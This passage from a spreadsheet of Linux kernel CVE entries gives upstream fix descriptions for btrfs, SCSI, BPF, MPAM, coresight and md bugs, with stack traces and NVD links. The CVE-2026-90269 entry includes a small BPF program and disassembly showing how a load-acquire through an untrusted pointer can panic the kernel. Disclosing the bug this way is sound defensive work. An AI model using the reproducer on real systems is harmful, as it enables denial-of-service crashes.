   entry_SYSCALL_64_after_hwframe+0x77/0x7f
   &lt;/TASK&gt;
  ---[ end trace 0000000000000000 ]---
[CAUSE]
Since commit ff66fe666233 ("btrfs: fix incorrect buffered IO fallback
for append direct writes"), if the direct IO finished short, we will
revert the isize back to the original one, so that append writes can be
respected during the buffered fallback.
Normally we rely on lock_and_cleanup_extent_if_need() function during
buffered writeback to wait for any existing ordered extents.
But that ordered extent waiting only happens if the start_pos is inside
the isize.
Since we have reverted the isize during failed direct IO, we will not
wait for any ordered extents.
This means we can have a race where the direct IO OE is still in the
tree, finished but not yet removed, then we're inserting the OE for the
buffered write, causing the above crash.
[FIX]
Make the OE wait to be unconditional, to handle the reverted isize
situation.
And since lock_and_cleanup_extent_if_need() now either lock the
extents or return -EAGAIN, also remove the branches that handles
no-extent-locked cases, and rename it to remove the "_if_need" suffix.
The following micro benchmark shows the runtime difference for
btrfs_buffered_write(), doing `xfs_io -f -c "pwrite 0 1m"` workload,
all values are the average runtime in nano seconds.
      function runtime              |   before    |     after
 -----------------------------------+-------------+---------------
 lock_and_cleanup_extent_if_need()  |     58.2    |    183.0
 btrfs_buffered_write()             |   2115.6    |   2973.3
The overall runtime of btrfs_buffered_write() is still pretty
tiny (still less than 3 micro seconds), I'd say the extra cost is still
acceptable.
An alternative to fix this problem is to wait ordered extents during
iomap_end() where the isize revert is done.
But that solution will break nowait requirement, as if a nowait direct
IO finished short, we have to wait for the OEs unconditionally or the
next append buffered IO can still hit the same problem.
So here we have to move the wait cost to buffered write, but at least
the code is slightly more streamline.</t>
        </is>
      </c>
      <c r="T632" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90264</t>
        </is>
      </c>
    </row>
    <row r="633">
      <c r="A633" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B633" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C633" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90265</t>
        </is>
      </c>
      <c r="D633" s="5" t="inlineStr"/>
      <c r="E633" s="5" t="inlineStr"/>
      <c r="F633" s="5" t="inlineStr"/>
      <c r="G633" s="5" t="inlineStr"/>
      <c r="H633" s="5" t="inlineStr"/>
      <c r="I633" s="5" t="inlineStr"/>
      <c r="J633" s="5" t="inlineStr"/>
      <c r="K633" s="5" t="inlineStr"/>
      <c r="L633" s="5" t="inlineStr"/>
      <c r="M633" s="5" t="inlineStr"/>
      <c r="N633" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O633" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P633" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q633" s="5" t="inlineStr"/>
      <c r="R633" s="5" t="inlineStr"/>
      <c r="S633" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
btrfs: defrag: fix deadlock between defrag and delalloc space reservation
While running fsstress with autodefrag and flushoncommit, hit a deadlock
due to the fact that defrag reserves delalloc space while it's holding
dirty and locked folios, besides the extent range lock. The stack traces
are the following:
   [958.624] task:kworker/u50:3   state:D stack:0     pid:20365 tgid:20365 ppid:2      task_flags:0x4208060 flags:0x00080000
   [958.626] Workqueue: events_unbound btrfs_async_reclaim_metadata_space [btrfs]
   [958.627] Call Trace:
   [958.628]  &lt;TASK&gt;
   [958.628]  __schedule+0x4be/0x10f0
   [958.629]  ? preempt_count_add+0x69/0xa0
   [958.630]  schedule+0x26/0xd0
   [958.631]  wait_current_trans+0x102/0x160 [btrfs]
   [958.632]  ? __pfx_autoremove_wake_function+0x10/0x10
   [958.633]  start_transaction+0x374/0x900 [btrfs]
   [958.634]  btrfs_commit_current_transaction+0x1d/0x70 [btrfs]
   [958.635]  flush_space+0xca/0x5e0 [btrfs]
   [958.636]  ? _raw_spin_unlock+0x15/0x30
   [958.637]  ? btrfs_reduce_alloc_profile+0x8c/0x190 [btrfs]
   [958.639]  ? _raw_spin_unlock+0x15/0x30
   [958.640]  ? calc_available_free_space.isra.0+0x6f/0x110 [btrfs]
   [958.641]  do_async_reclaim_metadata_space+0x84/0x190 [btrfs]
   [958.642]  btrfs_async_reclaim_metadata_space+0x64/0x80 [btrfs]
   [958.644]  process_one_work+0x19d/0x3a0
   [958.644]  worker_thread+0x1c4/0x330
   [958.645]  ? __pfx_worker_thread+0x10/0x10
   [958.646]  kthread+0xfc/0x130
   [958.647]  ? __pfx_kthread+0x10/0x10
   [958.648]  ret_from_fork+0x1f7/0x2c0
   [958.648]  ? __pfx_kthread+0x10/0x10
   [958.649]  ret_from_fork_asm+0x1a/0x30
   [958.650]  &lt;/TASK&gt;
   [958.651] task:kworker/u49:7   state:D stack:0     pid:52990 tgid:52990 ppid:2      task_flags:0x4208060 flags:0x00080000
   [958.653] Workqueue: writeback wb_workfn (flush-btrfs-334)
   [958.655] Call Trace:
   [958.655]  &lt;TASK&gt;
   [958.656]  __schedule+0x4be/0x10f0
   [958.657]  ? __blk_flush_plug+0xe9/0x140
   [958.658]  schedule+0x26/0xd0
   [958.658]  io_schedule+0x42/0x70
   [958.659]  folio_wait_bit_common+0x12b/0x330
   [958.660]  ? folio_wait_bit_common+0x100/0x330
   [958.662]  ? __pfx_wake_page_function+0x10/0x10
   [958.663]  extent_write_cache_pages+0x599/0x830 [btrfs]
   [958.664]  ? acpi_fwnode_get_reference_args+0x1fa/0x270
   [958.665]  btrfs_writepages+0x77/0x130 [btrfs]
   [958.666]  ? __pfx_end_bbio_data_write+0x10/0x10 [btrfs]
   [958.667]  do_writepages+0xc6/0x160
   [958.668]  __writeback_single_inode+0x42/0x310
   [958.669]  writeback_sb_inodes+0x231/0x570
   [958.670]  wb_writeback+0x8a/0x340
   [958.671]  wb_workfn+0xbf/0x450
   [958.672]  ? finish_task_switch.isra.0+0xc1/0x350
   [958.673]  process_one_work+0x19d/0x3a0
   [958.673]  worker_thread+0x1c4/0x330
   [958.674]  ? __pfx_worker_thread+0x10/0x10
   [958.675]  kthread+0xfc/0x130
   [958.676]  ? __pfx_kthread+0x10/0x10
   [958.676]  ret_from_fork+0x1f7/0x2c0
   [958.677]  ? __pfx_kthread+0x10/0x10
   [958.678]  ret_from_fork_asm+0x1a/0x30
   [958.679]  &lt;/TASK&gt;
   [958.679] task:btrfs-cleaner   state:D stack:0     pid:296750 tgid:296750 ppid:2      task_flags:0x208040 flags:0x00080000
   [958.681] Call Trace:
   [958.682]  &lt;TASK&gt;
   [958.682]  __schedule+0x4be/0x10f0
   [958.683]  schedule+0x26/0xd0
   [958.684]  handle_reserve_ticket+0x1b9/0x2c0 [btrfs]
   [958.685]  ? __pfx_autoremove_wake_function+0x10/0x10
   [958.686]  reserve_bytes+0x283/0x4c0 [btrfs]
   [958.687]  btrfs_reserve_metadata_bytes+0x18/0xb0 [btrfs]
   [958.688]  btrfs_delalloc_reserve_metadata+0x121/0x320 [btrfs]
   [958.690]  btrfs_delalloc_reserve_space+0x46/0xb0 [btrfs]
   [958.691]  btrfs_defrag_file+0x903/0x1110 [btrfs]
   [958.692]  btrfs_run_defrag_inodes+0x334/0x430 [btrfs]
   [958.694]  cleaner_kthread+0x97/0x1c0 [btrfs]
   [958.694]  ? __pfx_cleaner_kthread+0x10/0x10 [btrfs]
   [958.696]  kthread+0xfc/0x130
   [958.696]  ? __pfx_kthread+0x10/0x10
   [958.697]  ret_
---truncated---</t>
        </is>
      </c>
      <c r="T633" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90265</t>
        </is>
      </c>
    </row>
    <row r="634">
      <c r="A634" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B634" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C634" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90266</t>
        </is>
      </c>
      <c r="D634" s="5" t="inlineStr"/>
      <c r="E634" s="5" t="inlineStr"/>
      <c r="F634" s="5" t="inlineStr"/>
      <c r="G634" s="5" t="inlineStr"/>
      <c r="H634" s="5" t="inlineStr"/>
      <c r="I634" s="5" t="inlineStr"/>
      <c r="J634" s="5" t="inlineStr"/>
      <c r="K634" s="5" t="inlineStr"/>
      <c r="L634" s="5" t="inlineStr"/>
      <c r="M634" s="5" t="inlineStr"/>
      <c r="N634" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O634" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P634" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q634" s="5" t="inlineStr"/>
      <c r="R634" s="5" t="inlineStr"/>
      <c r="S634" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
btrfs: zoned: don't force read-only on transient -EAGAIN from reloc merge
On a zoned FS, btrfs_delayed_refs_rsv_refill() returns -EAGAIN whenever
the over-committed metadata plus the zone_unusable bytes exceeds the
usable size in a metadata block-group to avoid heavy over-commit of
metadata and early ENOSPC in one transaction.
If this happens while doing reclaim, the transaction is getting aborted.
Treat -EAGAIN as a soft, retryable condition in case of block-group
reclaim.</t>
        </is>
      </c>
      <c r="T634" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90266</t>
        </is>
      </c>
    </row>
    <row r="635">
      <c r="A635" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B635" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C635" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90267</t>
        </is>
      </c>
      <c r="D635" s="5" t="inlineStr"/>
      <c r="E635" s="5" t="inlineStr"/>
      <c r="F635" s="5" t="inlineStr"/>
      <c r="G635" s="5" t="inlineStr"/>
      <c r="H635" s="5" t="inlineStr"/>
      <c r="I635" s="5" t="inlineStr"/>
      <c r="J635" s="5" t="inlineStr"/>
      <c r="K635" s="5" t="inlineStr"/>
      <c r="L635" s="5" t="inlineStr"/>
      <c r="M635" s="5" t="inlineStr"/>
      <c r="N635" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O635" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P635" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q635" s="5" t="inlineStr"/>
      <c r="R635" s="5" t="inlineStr"/>
      <c r="S635" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: sd: Fix special_vec mempool leak when scsi_alloc_sgtables() fails
sd_set_special_bvec() allocates a special payload page for UNMAP and
WRITE SAME commands. If scsi_alloc_sgtables() fails afterward in
sd_setup_unmap_cmnd() or sd_setup_write_same{10,16}_cmnd(), the SCSI
midlayer does not call uninit_command() because RQF_DONTPREP is not set
yet, leaking the page.
Call sd_uninit_command() on error, and clear RQF_SPECIAL_PAYLOAD after
freeing the page.</t>
        </is>
      </c>
      <c r="T635" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90267</t>
        </is>
      </c>
    </row>
    <row r="636">
      <c r="A636" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B636" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C636" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90268</t>
        </is>
      </c>
      <c r="D636" s="5" t="inlineStr"/>
      <c r="E636" s="5" t="inlineStr"/>
      <c r="F636" s="5" t="inlineStr"/>
      <c r="G636" s="5" t="inlineStr"/>
      <c r="H636" s="5" t="inlineStr"/>
      <c r="I636" s="5" t="inlineStr"/>
      <c r="J636" s="5" t="inlineStr"/>
      <c r="K636" s="5" t="inlineStr"/>
      <c r="L636" s="5" t="inlineStr"/>
      <c r="M636" s="5" t="inlineStr"/>
      <c r="N636" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O636" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P636" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q636" s="5" t="inlineStr"/>
      <c r="R636" s="5" t="inlineStr"/>
      <c r="S636" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: sd: Fix error handling in sd_probe() after large pool creation failure
After device_add(&amp;sdkp-&gt;disk_dev) succeeds, sd_large_pool_create()
failure must unregister disk_dev and let scsi_disk_release() free
sdkp. Going through out_free_index kfree()s an already registered device
and leaks the sysfs entry.</t>
        </is>
      </c>
      <c r="T636" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90268</t>
        </is>
      </c>
    </row>
    <row r="637">
      <c r="A637" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B637" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C637" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90269</t>
        </is>
      </c>
      <c r="D637" s="5" t="inlineStr"/>
      <c r="E637" s="5" t="inlineStr"/>
      <c r="F637" s="5" t="inlineStr"/>
      <c r="G637" s="5" t="inlineStr"/>
      <c r="H637" s="5" t="inlineStr"/>
      <c r="I637" s="5" t="inlineStr"/>
      <c r="J637" s="5" t="inlineStr"/>
      <c r="K637" s="5" t="inlineStr"/>
      <c r="L637" s="5" t="inlineStr"/>
      <c r="M637" s="5" t="inlineStr"/>
      <c r="N637" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O637" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P637" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q637" s="5" t="inlineStr"/>
      <c r="R637" s="5" t="inlineStr"/>
      <c r="S637" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Reject load-acquire from pointers requiring fault protection
A BPF_LOAD_ACQ is not rewritten to a BPF_PROBE_MEM load by the verifier,
unlike a regular BPF_LDX, so the JIT emits a plain load with no exception
table entry and a fault panics the kernel instead of being handled.
Reject the source pointer types that a BPF_LDX would have had that fault
protection applied to, i.e. the ones bpf_convert_ctx_accesses() turns
into BPF_PROBE_MEM: a bare PTR_TO_BTF_ID, PTR_TO_BTF_ID | PTR_UNTRUSTED,
PTR_TO_BTF_ID | MEM_ALLOC | PTR_UNTRUSTED and PTR_TO_MEM | MEM_RDONLY |
PTR_UNTRUSTED.
This is reachable e.g. by loading -&gt;mm out of a trusted task_struct
yields an untrusted pointer to mm_struct, and it is NULL for a kernel
thread:
  [...]
  SEC("tp_btf/sched_switch")
  int BPF_PROG(demo, bool preempt, struct task_struct *prev,
               struct task_struct *next)
  {
      struct mm_struct *mm = next-&gt;mm;  /* untrusted */
      out_ldx = (__u64)mm-&gt;pgd;         /* BPF_LDX      */
      out_acq = load_acquire(&amp;mm-&gt;pgd); /* BPF_LOAD_ACQ */
      return 0;
  }
  [...]
Both dereference the same pointer, but only the BPF_LDX is protected
(x86-64 JIT, jump targets shown prog-relative):
  [...]
  ; out_ldx = (__u64)mm-&gt;pgd;
  17:   movq    $-10485760, %r10
  1e:   movq    %rsi, %r11
  21:   addq    $184, %r11
  28:   subq    %r10, %r11
  2b:   movabsq $140737498841088, %r10
  35:   cmpq    %r10, %r11
  38:   ja      0x3e                 &lt;-- kernel addr?
  3a:   xorl    %edi, %edi           &lt;-- no: dst = 0, skip the load
  3c:   jmp     0x45
  3e:   movq    184(%rsi), %rdi      &lt;-- yes: load + extable entry
  [...]
  ; load_acquire(&amp;mm-&gt;pgd)
  53:	movq    %rsi, %rdi
  56:	movq    184(%rdi), %rax       &lt;-- no check, no extable entry
  [...]
Note that BPF_PROBE_MEM is not visible in a bpftool xlated dump, as
bpf_insn_prepare_dump() rewrites it back to BPF_MEM.
A PTR_TRUSTED pointer is deliberately not on the list. Such a load is
not converted either, but it does not need to be, since the pointer is
guaranteed live, so load-acquire from it stays allowed.
The check is gated on BPF_LOAD_ACQ so that atomic RMW and store-release
error messages are unchanged; writes (RMW / store-release) to such
pointers are already rejected elsewhere, so only load-acquire needs this.</t>
        </is>
      </c>
      <c r="T637" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90269</t>
        </is>
      </c>
    </row>
    <row r="638">
      <c r="A638" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B638" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C638" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90270</t>
        </is>
      </c>
      <c r="D638" s="5" t="inlineStr"/>
      <c r="E638" s="5" t="inlineStr"/>
      <c r="F638" s="5" t="inlineStr"/>
      <c r="G638" s="5" t="inlineStr"/>
      <c r="H638" s="5" t="inlineStr"/>
      <c r="I638" s="5" t="inlineStr"/>
      <c r="J638" s="5" t="inlineStr"/>
      <c r="K638" s="5" t="inlineStr"/>
      <c r="L638" s="5" t="inlineStr"/>
      <c r="M638" s="5" t="inlineStr"/>
      <c r="N638" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O638" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P638" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q638" s="5" t="inlineStr"/>
      <c r="R638" s="5" t="inlineStr"/>
      <c r="S638" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
arm_mpam: Disable driver unbind to avoid UAF
When a user unbinds an MSC and that MSC is the only MSC left for a
component then the corresponding mpam_component will be freed. If the user
then goes on to read the schemata file in the resctrl filesystem then the
mpam_component will be accessed from resctrl_arch_get_config() leading to a
use after free.
As the MPAM driver is not a module the unbind sysfs interface is the only
way to trigger the remove. Instead of dealing with the complexity of
allowing some unused MSC to unbind just remove the unbind sysfs interface.</t>
        </is>
      </c>
      <c r="T638" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90270</t>
        </is>
      </c>
    </row>
    <row r="639">
      <c r="A639" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B639" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C639" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90271</t>
        </is>
      </c>
      <c r="D639" s="5" t="inlineStr"/>
      <c r="E639" s="5" t="inlineStr"/>
      <c r="F639" s="5" t="inlineStr"/>
      <c r="G639" s="5" t="inlineStr"/>
      <c r="H639" s="5" t="inlineStr"/>
      <c r="I639" s="5" t="inlineStr"/>
      <c r="J639" s="5" t="inlineStr"/>
      <c r="K639" s="5" t="inlineStr"/>
      <c r="L639" s="5" t="inlineStr"/>
      <c r="M639" s="5" t="inlineStr"/>
      <c r="N639" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O639" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P639" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q639" s="5" t="inlineStr"/>
      <c r="R639" s="5" t="inlineStr"/>
      <c r="S639" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
arm_mpam: Fix a NULL pointer dereference on unbinding after an error interrupt
If a user unbinds an MSC after mpam_disable() has been run in response
to an error interrupt then a dereference of a NULL pointer occurs as
mpam_disable() sets the drvdata to NULL. Add an early return to the driver
remove callback to avoid this.</t>
        </is>
      </c>
      <c r="T639" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90271</t>
        </is>
      </c>
    </row>
    <row r="640">
      <c r="A640" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B640" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C640" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90272</t>
        </is>
      </c>
      <c r="D640" s="5" t="inlineStr"/>
      <c r="E640" s="5" t="inlineStr"/>
      <c r="F640" s="5" t="inlineStr"/>
      <c r="G640" s="5" t="inlineStr"/>
      <c r="H640" s="5" t="inlineStr"/>
      <c r="I640" s="5" t="inlineStr"/>
      <c r="J640" s="5" t="inlineStr"/>
      <c r="K640" s="5" t="inlineStr"/>
      <c r="L640" s="5" t="inlineStr"/>
      <c r="M640" s="5" t="inlineStr"/>
      <c r="N640" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O640" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P640" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q640" s="5" t="inlineStr"/>
      <c r="R640" s="5" t="inlineStr"/>
      <c r="S640" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
perf: arm_pmuv3: Zero initialize hw_id branch stack field
PERF_SAMPLE_BRANCH_HW_INDEX is supported by BRBE so hw_id is passed to
userspace, but it's never set by the BRBE driver. Zero initialize it as
it should be according to the docs:
   * For the architectures whose raw branch records are
   * already stored in age order, the hw_idx should be 0.
It's probably too risky to remove PERF_SAMPLE_BRANCH_HW_INDEX from BRBE
now in case anyone is setting it and reading the value, but zero
initializing the whole struct also protects against the same issue with
new fields that are added in the future.</t>
        </is>
      </c>
      <c r="T640" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90272</t>
        </is>
      </c>
    </row>
    <row r="641">
      <c r="A641" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B641" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C641" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90273</t>
        </is>
      </c>
      <c r="D641" s="5" t="inlineStr"/>
      <c r="E641" s="5" t="inlineStr"/>
      <c r="F641" s="5" t="inlineStr"/>
      <c r="G641" s="5" t="inlineStr"/>
      <c r="H641" s="5" t="inlineStr"/>
      <c r="I641" s="5" t="inlineStr"/>
      <c r="J641" s="5" t="inlineStr"/>
      <c r="K641" s="5" t="inlineStr"/>
      <c r="L641" s="5" t="inlineStr"/>
      <c r="M641" s="5" t="inlineStr"/>
      <c r="N641" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O641" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P641" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q641" s="5" t="inlineStr"/>
      <c r="R641" s="5" t="inlineStr"/>
      <c r="S641" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
coresight: etm4x: missing cscfg_csdev_disable_active_config() in perf enable
In the perf enable path, there are missing cases where
cscfg_csdev_disable_active_config() is not called:
  - Branch broadcast is selected but not supported by the hardware
  - etm4_enable_hw() fails
This can lead to a leak of config_desc-&gt;active_cnt.
Fix this by properly calling cscfg_csdev_disable_active_config()
in these error paths.</t>
        </is>
      </c>
      <c r="T641" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90273</t>
        </is>
      </c>
    </row>
    <row r="642">
      <c r="A642" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B642" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C642" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90274</t>
        </is>
      </c>
      <c r="D642" s="5" t="inlineStr"/>
      <c r="E642" s="5" t="inlineStr"/>
      <c r="F642" s="5" t="inlineStr"/>
      <c r="G642" s="5" t="inlineStr"/>
      <c r="H642" s="5" t="inlineStr"/>
      <c r="I642" s="5" t="inlineStr"/>
      <c r="J642" s="5" t="inlineStr"/>
      <c r="K642" s="5" t="inlineStr"/>
      <c r="L642" s="5" t="inlineStr"/>
      <c r="M642" s="5" t="inlineStr"/>
      <c r="N642" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O642" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P642" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q642" s="5" t="inlineStr"/>
      <c r="R642" s="5" t="inlineStr"/>
      <c r="S642" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
coresight: etm4x: fix underflow for usage of (nrseqstate - 1)
According to IHI006H Embedded Trace Macrocell Architecture
Specification[0], TRCSEQEVR&lt;n&gt; is implemented only when
TRCIDR5.NUMSEQSTATE is 0b100, in which case n ranges from 0 to 2;
otherwise, TRCIDR5.NUMSEQSTATE is 0b000.
IOW, the number of usage in the initialisation or setting
TRCSEQEVR&lt;n&gt; with drvdata-&gt;nrseqstate - 1 in the loop could make
underflow issue when TRCIDR5.NUMSEQSTATE is 0b000.
Therefore, introduce nr_seq_ctrls field and untie it from nrseqstate.
As part of this introduce ETM_MAX_SEQ_TRANSITIONS macro and
apply nr_seq_ctrls and above macro to TRCSEQEVR&lt;n&gt; relevant fields setup.</t>
        </is>
      </c>
      <c r="T642" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90274</t>
        </is>
      </c>
    </row>
    <row r="643">
      <c r="A643" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B643" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C643" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90275</t>
        </is>
      </c>
      <c r="D643" s="5" t="inlineStr"/>
      <c r="E643" s="5" t="inlineStr"/>
      <c r="F643" s="5" t="inlineStr"/>
      <c r="G643" s="5" t="inlineStr"/>
      <c r="H643" s="5" t="inlineStr"/>
      <c r="I643" s="5" t="inlineStr"/>
      <c r="J643" s="5" t="inlineStr"/>
      <c r="K643" s="5" t="inlineStr"/>
      <c r="L643" s="5" t="inlineStr"/>
      <c r="M643" s="5" t="inlineStr"/>
      <c r="N643" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O643" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P643" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q643" s="5" t="inlineStr"/>
      <c r="R643" s="5" t="inlineStr"/>
      <c r="S643" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
md/raid1: don't set array_frozen in raid1_takeover()
raid1_takeover() sets conf-&gt;array_frozen = 1 on the newly-allocated
r1conf and nothing ever clears it, so every I/O to the array stalls
permanently once _wait_barrier() sees it stuck at 1.
This used to be harmless: level_store() called mddev_resume() right
after pers-&gt;run(), which called raid1_quiesce(mddev, 0) and cleared
array_frozen back to 0 regardless of what raid1_takeover() set. Commit
b39f35ebe86d ("md: don't quiesce in mddev_suspend()") removed that
quiesce(mddev, 0) call, so the pre-set now sticks.
setup_conf() already zero-initializes the new r1conf via kzalloc, so
just don't set array_frozen here.
Same class of bug as commit 892da88d1cd9 ("md/raid10: fix a
'conf-&gt;barrier' leakage in raid10_takeover()"), also triggered by
b39f35ebe86d.</t>
        </is>
      </c>
      <c r="T643" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90275</t>
        </is>
      </c>
    </row>
    <row r="644">
      <c r="A644" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B644" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C644" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90276</t>
        </is>
      </c>
      <c r="D644" s="5" t="inlineStr"/>
      <c r="E644" s="5" t="inlineStr"/>
      <c r="F644" s="5" t="inlineStr"/>
      <c r="G644" s="5" t="inlineStr"/>
      <c r="H644" s="5" t="inlineStr"/>
      <c r="I644" s="5" t="inlineStr"/>
      <c r="J644" s="5" t="inlineStr"/>
      <c r="K644" s="5" t="inlineStr"/>
      <c r="L644" s="5" t="inlineStr"/>
      <c r="M644" s="5" t="inlineStr"/>
      <c r="N644" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O644" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P644" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q644" s="5" t="inlineStr"/>
      <c r="R644" s="5" t="inlineStr"/>
      <c r="S644" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
md/md-llbitmap: stop daemon timer rearm on destroy
llbitmap_destroy() deletes pending_timer before flushing
